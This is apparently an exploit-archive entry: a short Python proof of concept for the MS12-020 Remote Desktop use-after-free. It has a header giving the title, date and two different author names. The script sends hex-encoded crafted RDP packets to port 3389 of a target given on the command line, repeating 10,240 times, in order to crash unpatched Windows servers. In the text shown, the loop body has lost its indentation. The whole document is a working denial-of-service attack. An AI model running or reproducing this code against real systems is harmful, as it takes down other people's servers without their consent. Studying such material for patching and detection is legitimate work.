|
# Exploit Title: Pakyu Cenloder
# Date: March 16 2012
# Author: BMario
# Application Link: Microsoft Terminal Services / Remote Desktop Services
# http://msdn.microsoft.com/en-us/library/aa383015(v=vs.85).aspx
# Version: any Windows version before 13 Mar 2012
# Platforms: Windows
# Bug: use after free
# Exploitation: remote, versus server
# Author: Stanley Marshall
# Tested on: Windows 7 32bit
# CVE : MS12-020
import socket
import sys
headpack = "030000130ee000000000000100080000000000".decode('hex')
dafuq = "030001d602f0807f658201940401010401010101ff30190204000000000204000000020204000000000204000000010204000000000204000000010202ffff020400000002301902040000000102040000000102040000000102040000000102040000000002040000000102020420020400000002301c0202ffff0202fc170202ffff0204000000010204000000000204000000010202ffff02040000000204820133000500147c0001812a000800100001c00044756361811c01c0d800040008008002e00101ca03aa09040000ce0e000048004f005300540000000000000000000000000000000000000000000000000004000000000000000c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001ca010000000000100007000100300030003000300030002d003000300030002d0030003000300030003000300030002d003000300030003000300000000000000000000000000000000000000000000000000004c00c000d0000000000000002c00c001b0000000000000003c02c0003000000726470647200000000008080636c6970726472000000a0c0726470736e640000000000c0".decode('hex')
dafree = "0300000802f08028".decode('hex')
trololo = headpack+dafuq+dafree
HOSTNYO = sys.argv[1]
PORTNYO = 3389
for i in range(10240):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOSTNYO,PORTNYO))
s.send(trololo)
rec = s.recv(1024)
s.close()
|